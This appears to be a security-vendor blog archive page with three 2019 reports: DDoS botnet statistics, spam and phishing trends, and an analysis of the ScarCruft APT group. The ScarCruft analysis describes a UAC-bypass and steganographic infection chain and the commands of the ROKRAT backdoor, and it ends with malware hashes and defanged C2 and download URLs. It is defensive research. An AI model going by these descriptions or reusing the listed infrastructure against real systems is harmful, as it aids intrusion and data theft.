In the context of this report, the incident is counted as a single DDoS-attack only if the interval between botnet activity periods does not exceed 24 hours. For example, if the same web resource was attacked by the same botnet with an interval of 24 hours or more, then this is considered as two attacks. Bot requests originating from different botnets but directed at one resource also count as separate attacks.

The geographical locations of DDoS-attack victims and C&C servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.

DDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky Lab. Note that botnets are just one of the tools used for DDoS attacks, and that this section does not cover every single DDoS attack that occurred during the review period.

Quarter summary
  • In terms of the geographical distribution of attacks, China remains out in front. Having nearly surrendered top spot at the end of 2018, it consolidated its positions in Q1 2019.
  • The geographical distribution of targets roughly mirrors the geographical distribution of attacks: the Top 3 were again China (59.85%), the US (21.28%), and Hong Kong (4.21%).
  • Both geographic Top 10s saw relatively little reshuffling compared to previous quarters. There was no more sudden growth observed in botnet activity in unexpected places.
  • DDoS attacks peaked in the second half of March; the quietest period was January.
  • The most dangerous day of the week for DDoS attacks was Saturday, while Sunday remains the calmest.
  • The maximum attack duration decreased by more than a day against the previous quarter, although the percentage share of sustained DDoS sessions continued to rise and amounted to 21.34% (versus 16.66% in Q4 2018).
  • The share of SYN flooding increased to 84%, bringing down the share of UDP and TCP flood, while the share of HTTP and ICMP attacks rose to 3.3% and 0.6%, respectively.
  • The share of Linux botnets decreased slightly, but still remains predominant (95.71%).
  • Most botnet C&C servers are still located in the US (34.10%), with the Netherlands in second place (12.72%), and Russia in third (10.40%). It is notable that the once perennial leader, South Korea, returned to the Top 10, albeit in last place (2.31%).
Attack geography

China remains the leader by number of outgoing attacks. It even returned to its previous level after a drop in previous quarters: its share rose from 50.43% to 67.89%. In second place came the US, although its share was reduced from 24.90% to 17.17%. Third place belonged to Hong Kong, up from seventh, increasing its share from 1.84% to 4.81%.

Interestingly, except for China and Hong Kong, all other countries’ shares decreased. This did not prevent the US from retaining second position; meanwhile, Australia, having taken bronze at the end of 2018, dropped to last place, down 4 p.p. (from 4.57% to 0.56%).

Among other significant changes, it is worth noting Britain, which fell from fifth to seventh place having shed 1.52 p.p. (from 2.18% to 0.66%), as well as Canada and Saudi Arabia. Each of the latter two lost around 1 p.p., but that did not stop Canada (0.86%) climbing from sixth to fourth, while Saudi Arabia (0.58%) dropped down a rung towards the foot of the table.

Brazil, meanwhile, dropped out of the Top 10 altogether, making way for Singapore, which came straight in at number 5 with 0.82% of attacks (tellingly, its share too was down on the previous quarter, albeit very slightly).

South Korea, which previously juggled second and third place with the US, remains outside the Top 10 (accounting for 0.30% of attacks). However, although the Top 10 still looks slightly odd to us, there was no repeat of the out-of-the-blue changes observed in the past three quarters.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of DDoS attacks by country, Q4 2018 and Q1 2019 (download)

The results of the geographical distribution of targets are consistent with the geographical distribution of the attacks themselves: China is once again in first position (its share up from 43.26% to 59.85%), with the US in second (down from 29.14% to 21.28%) and Hong Kong in third (climbing from 1.76% to 4.21%).

Saudi Arabia dropped from fifth to sixth place, losing slightly more than 1 p.p. (its share decreased from 2.23% to 1.08%). Canada shed roughly the same amount (from 2.21% to 1.30%), yet rose from sixth to fourth place, while Britain’s more significant loss (from 2.73% to 1.18%) pushed it from fourth to fifth.

In the meantime, the Top 10 said goodbye to Australia and Brazil, which last quarter ranked third and eighth, respectively. They were replaced by Singapore, whose insignificant growth (from 0.72% to 0.94%) was enough to claim eighth place, and Poland, which saw its share nudge up from 0.33% to 0.90%, in ninth position. As before, the Top 10 was rounded off by Germany (0.77%).

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of unique DDoS-attack targets by country, Q4 2018 and Q1 2019 (download)

Dynamics of the number of DDoS attacks

In the last quarter, the most DDoS activity was observed in March, especially the second half. The highest peak was on March 16 (699 attacks). And a significant surge occurred on January 17, when we registered 532 attacks. Early January was calm as expected, with no prominent spikes or troughs; however, the quietest day of all was February 5 with a total of 51 attacks.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Dynamics of the number of DDoS attacks in Q1 2019 (download)

As for the distribution by day of the week, activity last quarter clearly shifted to the weekend: Saturday was the most intensive day (accounting for 16.65% of attacks), with Friday in second place (15.39%). Sundays saw a relative lull — just 11.41% of attacks. Recall that in late 2018 Thursday had the largest share of DDoS attacks (15.74%), with Sunday again the most peaceful.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of DDoS attacks by day of the week, Q4 2018 and Q1 2019 (download)

Duration and types of DDoS attacks

In Q1, the share of sustained attacks almost doubled — from 0.11% to 0.21%. However, instead of lasting almost 14 days (329 hours) as in Q4 2018, the longest attack this quarter was just slightly more than 12 days (289 hours).

On top of that, the share of all attacks lasting more than five hours increased significantly: whereas at the end of 2018 it was 16.66%, now the figure stands at 21.34%. If this segment is sliced into smaller sections, as seen on the graph, most categories of long-duration attacks experienced a rise, while only the proportion of attacks lasting 100–139 hours decreased slightly (from 0.14% to 0.11%). Accordingly, the share of short-duration attacks fell by almost 5 p.p. to 78.66%.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of DDoS attacks by duration (hours), Q4 2018 and Q1 2019 (download)

As in previous years, SYN flooding made up the lion’s share of junk traffic in Q1. Compared to Q4 2018, its share was even greater, climbing to 84.1%. Naturally, such a large rise (up from 58.2%, more than 20 p.p.) had an impact on the shares of other types of traffic.

For instance, UDP flooding, despite holding on to second spot, had a Q1 share of just 8.9% (down from 31.1%). The share of TCP flooding, previously ranked third, also dropped (from 8.4% to 3.1%), only good enough for fourth place behind HTTP flooding (which grew by 1.1 p.p. to 3.3%). ICMP traffic finished last as per tradition, despite its share rising from 0.1% to 0.6%.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of DDoS attacks by type, Q1 2019 (download)

Linux botnets still vastly outnumber their Windows-based counterparts, although in Q1 2019 the gap closed slightly: Linux botnets now make up not 97.11% but 95.71% of the total, while the respective share of Windows botnets went up by approximately 1.5 p.p. to 4.29%. However, this is not because Windows devices are becoming more popular, but due to the declining number of C&C servers of the Mirai bot and its Darkai clone. As a result, the number of attacks by these bots decreased by three and seven times, respectively.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Ratio of Windows/Linux botnet attacks, Q4 2018 and Q1 2019 (download)

Botnet distribution geography

The leading country by number of botnets on its soil remains the US (34.10%). The Netherlands rose from third in Q4 2018 to second place (12.72%). Third place this time went to Russia (10.40%), which climbed all the way up from seventh. China (7.51%) rose from the foot of the ranking to fourth, just missing out on a return to the Top 3.

Greece and Germany, meanwhile, slipped out of the Top 10. They made room for Vietnam (4.05%) in seventh, and South Korea (2.31%). The latter only managed tenth place, despite previously having led this category for quite some time.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of botnet C&C servers by country, Q1 2019 (download)


In the previous three quarters, we saw some unexpected arrivals in several Top 10s — countries with no major track record as a source of DDoS threats suddenly asserted themselves. But Q1 2019 held no particular surprises, save for countries such as Saudi Arabia, the Netherlands, and Romania maintaining a high level of DDoS activity; in other words, their appearance in the Top 10s cannot be put down to random deviations. Meanwhile, cybercriminals previously based in South Korea seem to be in no hurry to reappear there. It is possible that we are witnessing the establishment of a new distribution of botnets by country.

Also worth noting is the significant decline in the botnet activity of Darkai, one of the Mirai clones: the number of attacks with its assistance decreased by seven times. Mirai itself was also hit hard, suffering a threefold drop in activity. This factor, among others, goes someway to explaining the certain decline in the number and duration of DDoS attacks.

2019. május 15.

Spam and phishing in Q1 2019

Quarterly highlights Valentine’s Day

As per tradition, phishing timed to coincide with lovey-dovey day was aimed at swindling valuable confidential information out of starry-eyed users, such as bank card details. The topics exploited by cybercriminals ranged from online flower shops to dating sites.

But most often, users were invited to order gifts for loved ones and buy medications such as Viagra. Clicking/tapping the link in such messages resulted in the victim’s payment details being sent to the cybercriminals.

New Apple products

Late March saw the unveiling of Apple’s latest products, which fraudsters were quick to pounce on, as usual. In the run-up to the event, the number of attempts to redirect users to scam websites imitating official Apple services rose significantly.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Growth in the number of attempts to redirect users to phishing Apple sites before the presentation (download)

Fake Apple ID login pages

Scammers polluted Internet traffic with phishing emails seemingly from Apple to try to fool recipients into following a link and entering their login credentials on a fake Apple ID login page.

Fake technical support

Fake customer support emails are one of the most popular types of online fraud. The number of such messages has grown quite significantly of late. Links to fake technical support sites (accompanied by rave reviews) can be seen both on dedicated forums and social networks.

Fake “Kaspersky Lab support service” accounts

All these profiles that we detected in Q1 have one thing in common: they offer assistance in matters related to one or another company products, with the promise of specially trained, highly qualified staff supposedly ready and waiting to help. Needless to say, it is not free. Not only do users not have their issue resolved, they are likely to be defrauded as well.

New Instagram “features”

Last year, we wrote that phishers and other scammers had moved beyond mailing lists and into the realm of the popular social network Instagram. This trend continued, with fraudsters exploiting the service to the full — not only leaving links to phishing resources in comments, but also registering accounts, paying for advertising posts, and even enticing celebrities to distribute content.

Cybercriminal advertisers use the same methods to lure victims by promising products or services at what seems a great price.

As usual in such schemes, the “buyer” is asked for all sorts of information, from name to bank details. It goes without saying that all the user gets is their private data compromised.

Mailshot phishing

In Q1, we registered several phishing mailings in the form of automatic notifications seemingly on behalf of major services in charge of managing legitimate mailing lists. Scammers tried to force recipients to follow the phishing links under the pretext of verifying an account or updating payment information. Sometimes fake domains were used with names similar to real services, while other times hacked sites redirected the victim to a fake authorization form.

Financial spam through the ACH system

In Q1, we observed a large surge in spam mailings aimed at users of the Automated Clearing House (ACH), a US-based e-payment system that processes vast quantities of consumer and small-business transactions. These mailings consisted of fake notifications about the status of transfers supposedly made by ordinary users or firms. Such messages contained both malicious attachments (archives, documents) and links to download files infected with malware.

“Dream job” offers from spammers

In Q3, we registered spam messages containing “dream job” offers. This quarter, we logged another major mailing topic: messages were sent supposedly on behalf of well-known companies sure to attract lots of potential applicants. Recipients were invited to register in the job search system for free by installing a special app on their computer to access the database. When trying to download the program from the “cloud service,” the user was shown a pop-up window titled DDoS Protection and a message with a link pointing to the site of an online recruitment company (the names of several popular recruitment agencies were used in the mailing). If the user followed it, a malicious DOC file containing Trojan.MSOffice.SAgent.gen was downloaded to their computer, which in turn downloaded Trojan-Banker.Win32.Gozi.bqr onto the victim’s machine.

Ransomware and cryptocurrency

As we expected, cybercriminal interest in cryptocurrency did not wane. Spammers continue to wring cryptocurrency payments out of users by means of “sextortion” — a topic we wrote about last year.

In Q1 2019, we uncovered a rather unusual scam mailing scheme whereby cybercriminals sent messages in the name of a CIA employee allegedly with access to a case file on the recipient for possession and distribution of digital pornographic materials involving minors.

The fictitious employee, whose name varied from message to message, claimed to have found the victim’s details in the case file (which were actually harvested from social networks/online chats/forums, etc.). It was said to be part of an international operation to arrest more than 2,000 pedophilia suspects in 27 countries worldwide. However, the “employee” happened to know that the victim was a well-off individual with a reputation to protect — for which a payment of 10,000 dollars in bitcoin was demanded.

Playing on people’s fear of private data being disclosed, the scammers employed the same tricks as last year, mentioning access to personal data, compromising pornographic materials, etc. But this time, to make the message more convincing and intimidating, a CIA officer was used as a bogeyman.

Malicious attacks on the corporate sector

In Q1, the corporate sector of the Runet was hit by a malicious spam attack. The content imitated real business correspondence, and the messages themselves were seemingly from partners of the victim company.

We also observed malicious mailings aimed at stealing the financial information of international companies through distributing fake messages in the name of a US company allegedly providing information services. Besides the attachment, there was nothing at all in the message. The lack of text was seemingly intended to prompt the victim to open the attached document containing Trojan.MSOffice.Alien.gen, which then downloaded and installed Trojan-Banker.Win32.Trickster.gen on the computer.

Attacks on the banking sector

Banks are firmly established as top phishing targets. Scammers try to make their fake messages as believable as possible by substituting legitimate domains into the sender’s address, copying the layout of official emails, devising plausible pretexts, etc. In Q1, phishers exploited high-profile events to persuade victims of the legitimacy of the received message — for example, they inserted into the message body a phrase about the Christchurch terror attack. The attackers hoped that this, plus the name of a New Zealand bank as the sender, would add credibility to the message. The email itself stated that the bank had introduced some new security features that required an update of the account details to use.

The link took the user to a phishing site mimicking the login page of the New Zealand bank in question. All data entered on the site was transferred to the cybercriminals when the Login button was clicked/tapped.

Statistics: spam Proportion of spam in mail traffic

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Proportion of spam in global mail traffic, Q4 2018 – Q1 2019 (download) (download)

In Q1 2019, the highest percentage of spam was recorded in March at 56.33%. The average percentage of spam in global mail traffic came to 55.97%, which is almost identical (+0.07 p.p.) to Q4 2018.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Proportion of spam in Runet mail traffic, Q4 2018 – Q1 2019 (download) (download)

Peak spam in traffic in the Russian segment of the Internet came in January (56.19%). The average value for the quarter was 55.48%, which is 2.01 p.p. higher than in Q4.

Sources of spam by country

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Sources of spam by country, Q1 2019 (download) (download)

As is customary, the top spam-originating countries were China (15.82%) and the US (12.64%); the other Top 3 regular, Germany, was down to fifth place in Q1 (5.86%), ceding third place to Russia (6.98%) and allowing Brazil (6.95%) to sneak into fourth. In sixth place came France (4.26%), followed by Argentina (3.42%), Poland (3.36%), and India (2.58%). The Top 10 is rounded off by Vietnam (2.18%).

Spam email size

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Spam email size, Q4 2018 – Q1 2019 (download) (download)

In Q1 2019, the share of very small emails (up to 2 KB) in spam increased against Q4 2018 by 7.14 p.p. to 73.98%. The share of 2–5 KB messages fell to 8.27% (down 3.15 p.p.). 10–20 KB messages made up 5.11% of spam traffic, up 1.08 p.p. on Q4. The share of messages sized 20–50 KB amounted to 3.00% (0.32 p.p. growth against Q4 2018).

Malicious attachments: malware families

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

TOP 10 malicious families in mail traffic, Q1 2019 (download) (download)

In Q1 2019, the most common malware in mail traffic turned out to be Exploit.MSOffice.CVE-2017-11882, with a share of 7.73%. In second place was Backdoor.Win32.Androm (7.62%), and Worm.Win32.WBVB (4.80%) took third. Fourth position went to another exploit for Microsoft Office in the shape of Exploit.MSOffice.CVE-2018-0802 (2.81%), while Trojan-Spy.Win32.Noon (2.42%) rounded off the Top 5.

Countries targeted by malicious mailshots

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Countries targeted by malicious mailshots, Q1 2019 (download) (download)

First place in the Top 3 countries by number of Mail Anti-Virus triggers yet again went to Germany (11.88%). It is followed by Vietnam (6.24%) in second position and Russia (5.70%) in third.

Statistics: phishing

In Q1 2019, the Anti-Phishing system prevented 111,832,308 attempts to direct users to scam websites. 12.11% of all Kaspersky Lab users worldwide experienced an attack.

Attack geography

In Q1 2019, as in the previous quarter, the country with the largest share of users attacked by phishers was Brazil with 21.66%, up 1.53 p.p.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of phishing attacks, Q1 2019 (download) (download)

In second place up from eighth was Australia (17.20%), adding 2.42 p.p. but still 4.46 p.p. behind top-place Brazil. Spain rose one position to 16.96% (+0.87 p.p.), just above Portugal (16.86%) and Venezuela (16.72%) propping up the Top 5.

Country %* Brazil 21.66 Australia 17.20 Spain 16.96 Portugal 16.81 Venezuela 16.72 Greece 15.86 Albania 15.11 Ecuador 14.99 Rwanda 14.89 Georgia 14.76

*Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky Lab users in the country

Organizations under attack

The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab’s Anti-Phishing component. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat.

This quarter, the banking sector remains in first place by number of attacks — the share of attacks on credit organizations increased by 5.23 p.p. against Q4 last year to 27.78%.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of organizations subjected to phishing attacks by category, Q1 2019 (download) (download)

Second place went to global Internet portals (19.82%), and payment systems — another category that includes financial institutions — finished third (17.33%).


In Q1 2019, the average share of spam in global mail traffic rose by 0.06 p.p. to 55.97%, and the Anti-Phishing system prevented more than 111,832,308 redirects to phishing sites, up 35,220,650 in comparison with the previous reporting period.

As previously, scammers wasted no opportunity to exploit high-profile media events for their own purposes (Apple product launch, New Zealand terror attack). Sextortion has not gone away — on the contrary, to make such schemes more believable, cybercriminals have come up with new cover stories about the message senders.

On top of all that, attackers continue to use social networks to achieve their goals, and have launched advertising campaigns using celebrities to extend their reach.

2019. május 13.

ScarCruft continues to evolve, introduces Bluetooth harvester

Executive summary

After publishing our initial series of blogposts back in 2016, we have continued to track the ScarCruft threat actor. ScarCruft is a Korean-speaking and allegedly state-sponsored threat actor that usually targets organizations and companies with links to the Korean peninsula. The threat actor is highly skilled and, by all appearances, quite resourceful.

We recently discovered some interesting telemetry on this actor, and decided to dig deeper into ScarCruft’s recent activity. This shows that the actor is still very active and constantly trying to elaborate its attack tools. Based on our telemetry, we can reassemble ScarCruft’s binary infection procedure. It used a multi-stage binary infection to update each module effectively and evade detection. In addition, we analyzed the victims of this campaign and spotted an interesting overlap of this campaign with another APT actor known as DarkHotel.

Multi-stage binary infection

The ScarCruft group uses common malware delivery techniques such as spear phishing and Strategic Web Compromises (SWC). As in Operation Daybreak, this actor performs sophisticated attacks using a zero-day exploit. However, sometimes using public exploit code is quicker and more effective for malware authors. We witnessed this actor extensively testing a known public exploit during its preparation for the next campaign.

In order to deploy an implant for the final payload, ScarCruft uses a multi-stage binary infection scheme. As a rule, the initial dropper is created by the infection procedure. One of the most notable functions of the initial dropper is to bypass Windows UAC (User Account Control) in order to execute the next payload with higher privileges. This malware uses the public privilege escalation exploit code CVE-2018-8120 or UACME which is normally used by legitimate red teams. Afterwards, the installer malware creates a downloader and a configuration file from its resource and executes it. The downloader malware uses the configuration file and connects to the C2 server to fetch the next payload. In order to evade network level detection, the downloader uses steganography. The downloaded payload is an image file, but it contains an appended malicious payload to be decrypted.

Multi-stage binary infection

The final payload created by the aforementioned process is a well known backdoor, also known as ROKRAT by Cisco Talos. This cloud service-based backdoor contains many features. One of its main functions is to steal information. Upon execution, this malware creates 10 random directory paths and uses them for a specially designated purpose. The malware creates 11 threads simultaneously: six threads are responsible for stealing information from the infected host, and five threads are for forwarding collected data to four cloud services (Box, Dropbox, Pcloud and Yandex). When uploading stolen data to a cloud service, it uses predefined directory path such as /english, /video or /scriptout.

Cloud-based backdoor

The same malware contains full-featured backdoor functionality. The commands are downloaded from the /script path of a cloud service provider and the respective execution results are uploaded to the /scriptout path. It supports the following commands, which are enough to fully control the infected host:

  • Get File/Process listing
  • Download additional payload and execute
  • Execute Windows command
  • Update configuration data including cloud service token information
  • Save screenshot and an audio recording

The ScarCruft group keeps expanding its exfiltration targets to steal further information from infected hosts and continues to create tools for additional data exfiltration. During our research, we confirmed that they have an interest in mobile devices.

We also discovered an interesting piece of rare malware created by this threat actor – a Bluetooth device harvester. This malware is responsible for stealing Bluetooth device information. It is fetched by a downloader, and collects information directly from the infected host. This malware uses Windows Bluetooth APIs to find information on connected Bluetooth devices and saves the following information.

  • Instance Name: Name of device
  • Address: Address of device
  • Class: Class of the device
  • Connected: Whether the device is connected(true or false)
  • Authenticated: Whether the device is authenticated(true or false)
  • Remembered: Whether the device is a remembered device(true or false)

The attackers appear to be increasing the scope of the information collected from victims.

Build path of Bluetooth information harvester


We have found several victims of this campaign, based on our telemetry – investment and trading companies in Vietnam and Russia. We believe they may have some links to North Korea, which may explain why ScarCruft decided to closely monitor them. ScarCruft also attacked a diplomatic agency in Hong Kong, and another diplomatic agency in North Korea. It appears ScarCruft is primarily targeting intelligence for political and diplomatic purposes.

Victimology of this campaign

Overlap with other actors

We discovered one victim from Russia that also triggered a malware detection while staying in North Korea in the past. The fact that this victim visits North Korea makes its special and suggests that it may have valuable information about North Korean affairs. ScarCruft infected this victim on September 21, 2018. But before the ScarCruft infection, however, another APT group also targeted this victim with the host being infected with GreezeBackdoor on March 26, 2018.

GreezeBackdoor is a tool of the DarkHotel APT group, which we have previously written about. In addition, this victim was also attacked by the Konni malware on 03 April 2018. The Konni malware was disguised as a North Korean news item in a weaponized documents (the name of the document was “Why North Korea slams South Korea’s recent defense talks with U.S-Japan.zip”)

Infection timeline

This is not the first time we have seen an overlap of ScarCruft and DarkHotel actors. Members from our team have already presented on the conflict of these two threat actors at security conferences. We have also shared more details with our threat intelligence customers in the past. They are both Korean-speaking threat actors and sometimes their victimology overlaps. But both group seem to have different TTPs (Tactics, Techniques and Procedures) and it leads us to believe that one group regularly lurks in the other’s shadow.


The ScarCruft has shown itself to be a highly-skilled and active group. It has a keen interest in North Korean affairs, attacking those in the business sector who may have any connection to North Korea, as well as diplomatic agencies around the globe. Based on the ScarCruft’s recent activities, we strongly believe that this group is likely to continue to evolve. For more information please contact: intelreports@kaspersky.com

Appendix I – Indicators of Compromise File hashes (malicious documents, Trojans, emails, decoys)

ScarCruft tools

  • 02681a7fe708f39beb7b3cf1bd557ee9 Bluetooth info harvester
  • C781f5fad9b47232b3606e4d374900cd Installer
  • 032ed0cd234f73865d55103bf4ceaa22 Downloader
  • 22aaf617a86e026424edb7c868742495 AV Remover
  • 07d2200f5c2d03845adb5b20841faa94 AV Remover
  • 1f5ac2f1744ed9c3fd01fe72ee8d334f Initial Dropper
  • 4d20f7311f4f617104f559a04afd2fbf Installer
  • 03e5e566c1153cb1d18b8bc7c493025f Downloader
  • C66ef71830341bb99d30964a8089a1fc Loader
  • 5999e01b83aa1cc12a2ad6a0c0dc27c3 Installer
  • 4d3c34a3070643c225be1dbbb3457ad4 Injector
  • 0790F1D7A1B9432AA5B8590286EB8B95 Downloader
  • 04371bf88b598b56691b0ad9da08204b Installer
  • e8b23cfc805353f55ed67cf0af58f305 UAC bypass(UACME)
  • 5380a173757e67d9b12f316771012768 Installer
  • Ec0e77b57cb9dd7a04ab6e453810937c Downloader
  • 25701492a18854ffdb05317ec7d19c29 Installer
  • 172b4dc27e41e4a0c84a803b0b944d3e UAC bypass(UACME)
  • 7149c205d634c4d17dae33fffb8a68ab Image file embedded ROKRAT
  • A76c4a79e6ff73bfd7149a49852e8916 ROKRAT
  • F63fc2d11fcebd37be3891def5776f6c Dropper
  • 899e90a0851649a5c270d1f78baf60f2 Simple HTTP Downloader
  • E88f7f285163d0c080c8d3e525b35ab3 Simple HTTP Downloader
  • D7c94c5ba028dc22a570f660b8dee5b9 Simple HTTP Downloader
  • A6bd2cf7bccf552febb8e8347d07529a Simple HTTP Downloader
  • 7a338d08226f5a38353385c8a5dec746 Simple HTTP Downloader
  • 46F66D2D990660661D00F5177306309C Simple HTTP Uploader

GreezaBackdoor of DarkHotel

  • 5e0e11bca0e94914e565c1dcc1ee6860


  • 4c2016df6b546326d67ac2a79dea1343
  • http://34.13.42[.]35/uploads/1.jpg
  • http://34.13.42[.]35/uploads/2.jpg
  • http://34.13.42[.]35/uploads/qwerty.jpg
  • http://34.13.42[.]35/uploads/girl.jpg
  • http://34.13.42[.]35/uploads/girllisten.jpg
  • https://34.13.42[.]35/uploads/newmode.php
  • http://acddesigns.com[.]au/demo/red/images/slider-pic-6.jpg
  • http://kmbr1.nitesbr1[.]org/UserFiles/File/image/index.php
  • http://kmbr1.nitesbr1[.]org/UserFiles/File/images.png
  • http://www.stjohns-burscough[.]org/uploads/images.png
  • http://lotusprintgroup[.]com/images.png
  • https://planar-progress.000webhostapp[.]com/UserFiles/File/image/image/girl.jpg
  • https://planar-progress.000webhostapp[.]com/userfiles/file/sliderpic.jpg
